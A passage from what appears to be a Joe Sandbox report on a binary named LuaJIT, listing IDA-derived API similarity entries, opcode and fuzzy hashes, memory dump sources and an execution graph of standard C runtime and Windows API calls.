                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _set_errno_from_matherr
                                                                                                                                                                        • String ID: tanh
                                                                                                                                                                        • API String ID: 1187470696-874243715
                                                                                                                                                                        • Opcode ID: 0a0cb5a22677a767c1ff2a638b69de59b972d8315788a6de307129cec1c6edf7
                                                                                                                                                                        • Instruction ID: 09969b8aebeefa73455f94ec973b4bd6b0bfc5e63f7b3cb01410368645ed70d9
                                                                                                                                                                        • Opcode Fuzzy Hash: 0a0cb5a22677a767c1ff2a638b69de59b972d8315788a6de307129cec1c6edf7
                                                                                                                                                                        • Instruction Fuzzy Hash: 54215C77A186829BD7A0EF29E08026EF2E1FB88700F900135F68D86B56DF3DD4019F15
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CompareStringtry_get_function
                                                                                                                                                                        • String ID: CompareStringEx
                                                                                                                                                                        • API String ID: 3328479835-2590796910
                                                                                                                                                                        • Opcode ID: fb1c890ddb2a055798cdd89143855e7e553432db2242e5b9771681bd799df73e
                                                                                                                                                                        • Instruction ID: d6b074af8d0188e450a80f544bf8275773019d58e52f9b67d266ff28a664b077
                                                                                                                                                                        • Opcode Fuzzy Hash: fb1c890ddb2a055798cdd89143855e7e553432db2242e5b9771681bd799df73e
                                                                                                                                                                        • Instruction Fuzzy Hash: 61114772A0CBC296D760DB16B4406AAF7A0FB88B80F444136EE8D83B19CF3DD0508B49
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DateFormattry_get_function
                                                                                                                                                                        • String ID: GetDateFormatEx
                                                                                                                                                                        • API String ID: 595753042-159735388
                                                                                                                                                                        • Opcode ID: 29593a2998ac6117987e235cc15544d86eb18b79bbb5ee2f6b1f970d14c06510
                                                                                                                                                                        • Instruction ID: 0b2ce4d1ab21dc23947cfa96f80bcbae477971cf5c28d607ccabc362595aa327
                                                                                                                                                                        • Opcode Fuzzy Hash: 29593a2998ac6117987e235cc15544d86eb18b79bbb5ee2f6b1f970d14c06510
                                                                                                                                                                        • Instruction Fuzzy Hash: 95119072A08B86D6E610DF55B44009AF7A0FB88BC0F544136EE8D83B68CF3CD5148B45
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FormatTimetry_get_function
                                                                                                                                                                        • String ID: GetTimeFormatEx
                                                                                                                                                                        • API String ID: 3261793192-1692793031
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _handle_error
                                                                                                                                                                        • String ID: !$sqrt
                                                                                                                                                                        • API String ID: 1757819995-799759792
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                        • String ID: csm
                                                                                                                                                                        • API String ID: 2573137834-1018135373
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _handle_error
                                                                                                                                                                        • String ID: "$exp
                                                                                                                                                                        • API String ID: 1757819995-2878093337
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorFormatLastMessage_free_nolock
                                                                                                                                                                        • String ID: system error %d
                                                                                                                                                                        • API String ID: 3491801694-1688351658
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DefaultUsertry_get_function
                                                                                                                                                                        • String ID: GetUserDefaultLocaleName
                                                                                                                                                                        • API String ID: 3217810228-151340334
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • try_get_function.LIBVCRUNTIME ref: 00007FF738B09AF9
                                                                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,-00000018,00007FF738B0D7C2,?,?,00000000,00007FF738B0D6BA,?,?,?,00007FF738AFB0BD), ref: 00007FF738B09B13
                                                                                                                                                                        Strings
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                                                                                                                                        • String ID: InitializeCriticalSectionEx
                                                                                                                                                                        • API String ID: 539475747-3084827643
                                                                                                                                                                        • Opcode ID: f593fc07e1f163ed4f1411d2061b7c33e5da13f5e8e1107869e134c63be22fec
                                                                                                                                                                        • Instruction ID: 9d7ef7f009edc5334dcf183403b319b8c2d5b46a2c978bf3fb0206e9d68fe699
                                                                                                                                                                        • Opcode Fuzzy Hash: f593fc07e1f163ed4f1411d2061b7c33e5da13f5e8e1107869e134c63be22fec
                                                                                                                                                                        • Instruction Fuzzy Hash: A3F0B423B18BC7A1EA14AB41F4404A9E220FF48BD0FC44031E91D03B54CF3EE854D76A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • try_get_function.LIBVCRUNTIME ref: 00007FF738B09851
                                                                                                                                                                        • TlsSetValue.KERNEL32(?,?,?,00007FF738B0AB66,?,?,?,00007FF738AFAF01,?,?,?,?,00007FF738B102A3), ref: 00007FF738B09868
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
• Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Valuetry_get_function
                                                                                                                                                                        • String ID: FlsSetValue
                                                                                                                                                                        • API String ID: 738293619-3750699315
                                                                                                                                                                        • Opcode ID: 1d949419f1085bf99280a0a61ab6c09fbe3545b5b27d1b3e881a82ebf7306659
                                                                                                                                                                        • Instruction ID: 7cd4420f1607cb87434e53ad074cd3e32d237b050a49f23b8ec12ca827e11c51
                                                                                                                                                                        • Opcode Fuzzy Hash: 1d949419f1085bf99280a0a61ab6c09fbe3545b5b27d1b3e881a82ebf7306659
                                                                                                                                                                        • Instruction Fuzzy Hash: DBE06563A08687B1EA04BB51E4454B9E222AF487C1FC84035D92D06395CE3EE454E32B
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00007FF738A4348C), ref: 00007FF738A5DF1F
                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00007FF738A4348C), ref: 00007FF738A5DF83
                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00007FF738A4348C), ref: 00007FF738A5DFB9
                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00007FF738A4348C), ref: 00007FF738A5E003
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
• Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3168844106-0
                                                                                                                                                                        • Opcode ID: d7064577febaf475c7bb8ae2d0a4322ba4b58d71bdf70b5fad720353a296914f
                                                                                                                                                                        • Instruction ID: 2297dba5d179ac2145c004c8809ef93dec2cfeaf676bbb3a88d0ae468deac050
                                                                                                                                                                        • Opcode Fuzzy Hash: d7064577febaf475c7bb8ae2d0a4322ba4b58d71bdf70b5fad720353a296914f
                                                                                                                                                                        • Instruction Fuzzy Hash: 34310D37619B8586DB609B2AE45166AFBA0F798B98F040166EECD47B25CE3CC1448B14
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Execution Graph

                                                                                                                                                                        Execution Coverage:3.1%
                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                        Total number of Nodes:1305
                                                                                                                                                                        Total number of Limit Nodes:29
76069->76082 76073 7ff6fe0b1d23 76090 7ff6fe0a4f28 76073->76090 76076 7ff6fe0b1d7b 76078 7ff6fe0b1714 76076->76078 76156 7ff6fe0a9294 14 API calls 2 library calls 76076->76156 76078->76067 76081 7ff6fe0b7978 LeaveCriticalSection 76078->76081 76080->76067 76083 7ff6fe083ecc 76082->76083 76089 7ff6fe083ec7 76082->76089 76084 7ff6fe0aa9a0 TranslateName 26 API calls 76083->76084 76083->76089 76085 7ff6fe083ee7 76084->76085 76086 7ff6fe0aac48 TranslateName 26 API calls 76085->76086 76087 7ff6fe083f0a 76086->76087 76088 7ff6fe0aac7c TranslateName 26 API calls 76087->76088 76088->76089 76089->76073 76155 7ff6fe0a95a0 5 API calls try_get_function 76089->76155 76091 7ff6fe0a4f51 76090->76091 76092 7ff6fe0a4f73 76090->76092 76095 7ff6fe0a9294 __free_lconv_num 14 API calls 76091->76095 76096 7ff6fe0a4f5f 76091->76096 76093 7ff6fe0a4fcc 76092->76093 76097 7ff6fe0a4f77 76092->76097 76094 7ff6fe0b2ff4 _Wcsftime MultiByteToWideChar 76093->76094 76099 7ff6fe0a4fe7 76094->76099 76095->76096 76096->76076 76112 7ff6fe0b1e0c 76096->76112 76097->76096 76100 7ff6fe0a9294 __free_lconv_num 14 API calls 76097->76100 76104 7ff6fe0a4f8b 76097->76104 76098 7ff6fe0a4fee GetLastError 76102 7ff6fe09ae88 wcsftime 14 API calls 76098->76102 76099->76098 76103 7ff6fe0a5027 76099->76103 76107 7ff6fe0a501b 76099->76107 76110 7ff6fe0a9294 __free_lconv_num 14 API calls 76099->76110 76100->76104 76101 7ff6fe0aa290 wcsftime 15 API calls 76101->76096 76106 7ff6fe0a4ffb 76102->76106 76103->76096 76105 7ff6fe0b2ff4 _Wcsftime MultiByteToWideChar 76103->76105 76104->76101 76108 7ff6fe0a506f 76105->76108 76109 7ff6fe09aef8 _set_fmode 14 API calls 76106->76109 76111 7ff6fe0aa290 wcsftime 15 API calls 76107->76111 76108->76096 76108->76098 76109->76096 76110->76107 76111->76103 76113 7ff6fe0b19f0 tmpfile 23 API calls 76112->76113 76114 7ff6fe0b1e53 76113->76114 76115 7ff6fe0b1e81 76114->76115 76116 7ff6fe0b1e99 76114->76116 76117 7ff6fe09aed8 tmpfile 14 API calls 76115->76117 76118 7ff6fe0b79a0 tmpfile 18 API 
calls 76116->76118 76119 7ff6fe0b1e86 76117->76119 76120 7ff6fe0b1e9e 76118->76120 76125 7ff6fe09aef8 _set_fmode 14 API calls 76119->76125 76121 7ff6fe0b1ebe CreateFileW 76120->76121 76122 7ff6fe0b1ea5 76120->76122 76123 7ff6fe0b1fa4 GetFileType 76121->76123 76124 7ff6fe0b1f29 76121->76124 76126 7ff6fe09aed8 tmpfile 14 API calls 76122->76126 76129 7ff6fe0b1fb1 GetLastError 76123->76129 76130 7ff6fe0b2002 76123->76130 76127 7ff6fe0b1f71 GetLastError 76124->76127 76133 7ff6fe0b1f37 CreateFileW 76124->76133 76128 7ff6fe0b1e92 76125->76128 76131 7ff6fe0b1eaa 76126->76131 76134 7ff6fe09ae88 wcsftime 14 API calls 76127->76134 76128->76076 76135 7ff6fe09ae88 wcsftime 14 API calls 76129->76135 76137 7ff6fe0b78b8 tmpfile 15 API calls 76130->76137 76132 7ff6fe09aef8 _set_fmode 14 API calls 76131->76132 76132->76119 76133->76123 76133->76127 76134->76119 76136 7ff6fe0b1fc0 CloseHandle 76135->76136 76136->76119 76138 7ff6fe0b1ff2 76136->76138 76139 7ff6fe0b2024 76137->76139 76140 7ff6fe09aef8 _set_fmode 14 API calls 76138->76140 76141 7ff6fe0b2074 76139->76141 76143 7ff6fe0b1bfc tmpfile 62 API calls 76139->76143 76142 7ff6fe0b1ff7 76140->76142 76144 7ff6fe0b175c tmpfile 62 API calls 76141->76144 76147 7ff6fe0b207b 76141->76147 76142->76119 76143->76141 76145 7ff6fe0b20b2 76144->76145 76146 7ff6fe0b20bc 76145->76146 76145->76147 76146->76128 76149 7ff6fe0b213c CloseHandle CreateFileW 76146->76149 76148 7ff6fe0ad5d8 tmpfile 26 API calls 76147->76148 76148->76128 76150 7ff6fe0b2183 GetLastError 76149->76150 76154 7ff6fe0b21b1 76149->76154 76151 7ff6fe09ae88 wcsftime 14 API calls 76150->76151 76152 7ff6fe0b2190 76151->76152 76153 7ff6fe0b7ae0 tmpfile 15 API calls 76152->76153 76153->76154 76154->76128 76155->76073 76156->76078 76162 7ff6fdff64e4 94 API calls 76157->76162 76163 7ff6fdfe4490 94 API calls 76157->76163 76164 7ff6fdfdb3d0 94 API calls 76157->76164 76158 7ff6fdfd348c 76172 7ff6fdff0f90 94 API calls 2 library calls 76158->76172 76159 7ff6fdfd2ddf 76159->75995 
76159->76157 76159->76158 76161 7ff6fdfd2420 76162->76159 76163->76159 76164->76159 76173 7ff6fdff6f90 76165->76173 76168 7ff6fdff6f90 _mbsncpy_s 10 API calls 76169 7ff6fdff742c 76168->76169 76176 7ff6fdff7010 76169->76176 76172->76161 76175 7ff6fdff8b40 10 API calls 76173->76175 76174 7ff6fdff6fda 76174->76168 76175->76174 76177 7ff6fdff6f90 _mbsncpy_s 10 API calls 76176->76177 76178 7ff6fdff704b 76177->76178 76178->75997 76179->76003 76181->76007 76183 7ff6fe0aab3e 76182->76183 76184 7ff6fe0aab43 76182->76184 76205 7ff6fe0a97e0 6 API calls try_get_function 76183->76205 76188 7ff6fe0aab4b SetLastError 76184->76188 76206 7ff6fe0a9828 6 API calls try_get_function 76184->76206 76187 7ff6fe0aab66 76187->76188 76207 7ff6fe0a921c 76187->76207 76188->76018 76192 7ff6fe0aab97 76216 7ff6fe0a9828 6 API calls try_get_function 76192->76216 76193 7ff6fe0aab87 76214 7ff6fe0a9828 6 API calls try_get_function 76193->76214 76196 7ff6fe0aab9f 76198 7ff6fe0aabb5 76196->76198 76199 7ff6fe0aaba3 76196->76199 76197 7ff6fe0aab8e 76215 7ff6fe0a9294 14 API calls 2 library calls 76197->76215 76218 7ff6fe0aa750 14 API calls _set_fmode 76198->76218 76217 7ff6fe0a9828 6 API calls try_get_function 76199->76217 76203 7ff6fe0aabbd 76219 7ff6fe0a9294 14 API calls 2 library calls 76203->76219 76206->76187 76212 7ff6fe0a922d wcsftime 76207->76212 76208 7ff6fe0a927e 76211 7ff6fe09aef8 _set_fmode 13 API calls 76208->76211 76209 7ff6fe0a9262 RtlAllocateHeap 76210 7ff6fe0a927c 76209->76210 76209->76212 76210->76192 76210->76193 76211->76210 76212->76208 76212->76209 76220 7ff6fe0baddc EnterCriticalSection LeaveCriticalSection wcsftime 76212->76220 76214->76197 76215->76188 76216->76196 76217->76197 76218->76203 76219->76188 76220->76212 76222 7ff6fdfeb9a5 76221->76222 76227 7ff6fdfeb7d8 type_info::_name_internal_method 76221->76227 76229 7ff6fdfeb8f6 76222->76229 76245 7ff6fdfe0950 94 API calls strrchr 76222->76245 76224 7ff6fdfeb980 76239 7ff6fdfec060 76224->76239 76225 7ff6fdfeb966 76244 7ff6fdfebe30 
94 API calls type_info::_name_internal_method 76225->76244 76227->76224 76227->76225 76227->76229 76229->75919 76232 7ff6fdfef707 wcsxfrm 76230->76232 76233 7ff6fdfef81e 76232->76233 76236 7ff6fdfef727 wcsxfrm 76232->76236 76247 7ff6fdfe0a70 94 API calls 2 library calls 76233->76247 76235 7ff6fdfef7f0 wcsxfrm 76235->75921 76236->76235 76248 7ff6fdfe0950 94 API calls strrchr 76236->76248 76237->75923 76238->75924 76240 7ff6fdfe8d00 _free_nolock 94 API calls 76239->76240 76241 7ff6fdfec09a Concurrency::details::_UnrealizedChore::_CancelViaToken memcpy_s 76240->76241 76242 7ff6fdfec285 76241->76242 76246 7ff6fdfeb310 94 API calls 3 library calls 76241->76246 76242->76229 76244->76229 76245->76229 76246->76242 76247->76235 76248->76235 76250 7ff6fe09a9a4 76249->76250 76263 7ff6fe09aa57 memcpy_s 76249->76263 76252 7ff6fe09a9bb 76250->76252 76255 7ff6fe09aa67 76250->76255 76251 7ff6fe09aef8 _set_fmode 14 API calls 76253 7ff6fdfd5487 76251->76253 76271 7ff6fe0a91ac EnterCriticalSection 76252->76271 76267 7ff6fdfddd30 76253->76267 76257 7ff6fe0aab1c _set_fmode 14 API calls 76255->76257 76255->76263 76258 7ff6fe09aa83 76257->76258 76258->76263 76272 7ff6fe0aa290 76258->76272 76263->76251 76263->76253 76268 7ff6fdfddd6f wcsxfrm 76267->76268 76281 7ff6fdfd2f8a 76268->76281 76270 7ff6fdfd54b8 76270->75934 76273 7ff6fe0aa29f wcsftime 76272->76273 76274 7ff6fe0aa2db 76272->76274 76273->76274 76276 7ff6fe0aa2c2 HeapAlloc 76273->76276 76280 7ff6fe0baddc EnterCriticalSection LeaveCriticalSection wcsftime 76273->76280 76275 7ff6fe09aef8 _set_fmode 14 API calls 76274->76275 76278 7ff6fe0aa2e0 76275->76278 76276->76273 76277 7ff6fe0aa2d9 76276->76277 76277->76278 76278->76263 76280->76273 76282 7ff6fdfd2ddf 76281->76282 76282->76270 76283 7ff6fdfd348c 76282->76283 76286 7ff6fdff64e4 94 API calls 76282->76286 76287 7ff6fdfe4490 94 API calls 76282->76287 76288 7ff6fdfdb3d0 94 API calls 76282->76288 76289 7ff6fdff0f90 94 API calls 2 library calls 76283->76289 76285 7ff6fdfd2420 
76286->76282 76287->76282 76288->76282 76289->76285 76290->75941 76291->75943 76293 7ff6fdfef8d7 76292->76293 76295 7ff6fdfefb04 strrchr 76293->76295 76296 7ff6fdfefb0b wcsxfrm 76293->76296 76299 7ff6fdfef8fa wcsxfrm 76293->76299 76298 7ff6fdfef941 wcsxfrm 76295->76298 76311 7ff6fdfe0950 94 API calls strrchr 76295->76311 76296->76295 76310 7ff6fdfe0a70 94 API calls 2 library calls 76296->76310 76298->75837 76299->76295 76299->76298 76300 7ff6fdfefa6d 76299->76300 76304 7ff6fdfefa81 76299->76304 76307 7ff6fdfe0950 94 API calls strrchr 76300->76307 76302 7ff6fdfefa7f 76309 7ff6fdfed290 94 API calls wcsxfrm 76302->76309 76304->76302 76308 7ff6fdfe0950 94 API calls strrchr 76304->76308 76306->75838 76307->76302 76308->76302 76309->76295 76310->76295 76311->76298 76312->75846 76313->75855 76315 7ff6fe01ee25 76314->76315 76316 7ff6fe01ee4a 76315->76316 76331 7ff6fdfe1310 94 API calls __ExceptionPtrDestroy 76315->76331 76316->75684 76318 7ff6fe05dc40 76316->76318 76319 7ff6fe05dc70 76318->76319 76327 7ff6fe05ddcc _handle_error _mbsncpy_s 76319->76327 76332 7ff6fe05de50 76319->76332 76321 7ff6fe05dd15 76353 7ff6fdfd5074 76321->76353 76323 7ff6fe05dd4a 76324 7ff6fe05dd81 76323->76324 76356 7ff6fdfed720 94 API calls 3 library calls 76323->76356 76357 7ff6fe05e6e0 94 API calls memcpy_s 76324->76357 76327->75684 76328->75689 76329->75686 76330->75685 76331->76316 76333 7ff6fe05debb memcpy_s 76332->76333 76334 7ff6fe05df15 76333->76334 76358 7ff6fe05da60 94 API calls wcsxfrm 76333->76358 76338 7ff6fe05e64c 76334->76338 76339 7ff6fe05e18f 76334->76339 76349 7ff6fe05df1c 76334->76349 76337 7ff6fe05e391 76364 7ff6fe050960 96 API calls memcpy_s 76337->76364 76341 7ff6fe05e665 76338->76341 76365 7ff6fdfe1010 94 API calls std::rsfun 76338->76365 76342 7ff6fe05e212 76339->76342 76347 7ff6fe05e1af 76339->76347 76359 7ff6fdfe1010 94 API calls std::rsfun 76339->76359 76341->76321 76360 7ff6fe05dac0 94 API calls 76342->76360 76346 7ff6fe05e513 76346->76321 76348 7ff6fe05e30d 76347->76348 
76347->76349 76351 7ff6fe05e2c8 76347->76351 76348->76349 76362 7ff6fe05da60 94 API calls wcsxfrm 76348->76362 76349->76337 76363 7ff6fdfe1010 94 API calls std::rsfun 76349->76363 76351->76349 76361 7ff6fe05da60 94 API calls wcsxfrm 76351->76361 76354 7ff6fdfd508b CreateMutexW 76353->76354 76354->76323 76356->76324 76357->76327 76358->76334 76359->76342 76360->76347 76361->76349 76362->76349 76363->76337 76364->76346 76365->76341 76367 7ff6fdfe8d00 _free_nolock 94 API calls 76366->76367 76368 7ff6fdfdad2f 76367->76368 76368->75697 76370 7ff6fdfe0950 94 API calls strrchr 76368->76370 76369->75695 76370->75697 76402 7ff6fdff77f0 76371->76402 76373 7ff6fdff731f 76374 7ff6fdff72f8 76373->76374 76407 7ff6fdfe05a0 94 API calls 2 library calls 76373->76407 76374->75702 76375 7ff6fdff77f0 _wcsupr_s 94 API calls 76377 7ff6fdff72d0 76375->76377 76377->76373 76377->76374 76377->76375 76381 7ff6fdff7315 76377->76381 76379 7ff6fdff77f0 _wcsupr_s 94 API calls 76379->76377 76380 7ff6fdff737f _wcsupr_s 76408 7ff6fdfe0600 5 API calls _free_nolock 76380->76408 76406 7ff6fdff78c0 94 API calls _wcsupr_s 76381->76406 76385 7ff6fe004c45 76384->76385 76445 7ff6fe005c90 76385->76445 76390 7ff6fe004c90 76391 7ff6fe004dd5 76390->76391 76474 7ff6fe004e10 94 API calls 2 library calls 76390->76474 76391->75707 76395 7ff6fe004c62 76395->76390 76457 7ff6fe0051c0 76395->76457 76461 7ff6fe005170 76395->76461 76465 7ff6fe004840 76395->76465 76472 7ff6fe004e10 94 API calls 2 library calls 76395->76472 76473 7ff6fdfdad60 94 API calls _free_nolock 76395->76473 76398->75711 76399->75701 76400->75707 76401->75709 76403 7ff6fdff7834 76402->76403 76405 7ff6fdff7250 76402->76405 76409 7ff6fdff7700 76403->76409 76405->76377 76405->76379 76406->76373 76407->76380 76408->76374 76414 7ff6fdfe4600 76409->76414 76411 7ff6fdff773d 76411->76405 76420 7ff6fe09b000 76414->76420 76418 7ff6fdfe462e 76418->76411 76419 7ff6fdfe0690 94 API calls 2 library calls 76418->76419 76419->76411 76421 7ff6fe09b009 76420->76421 
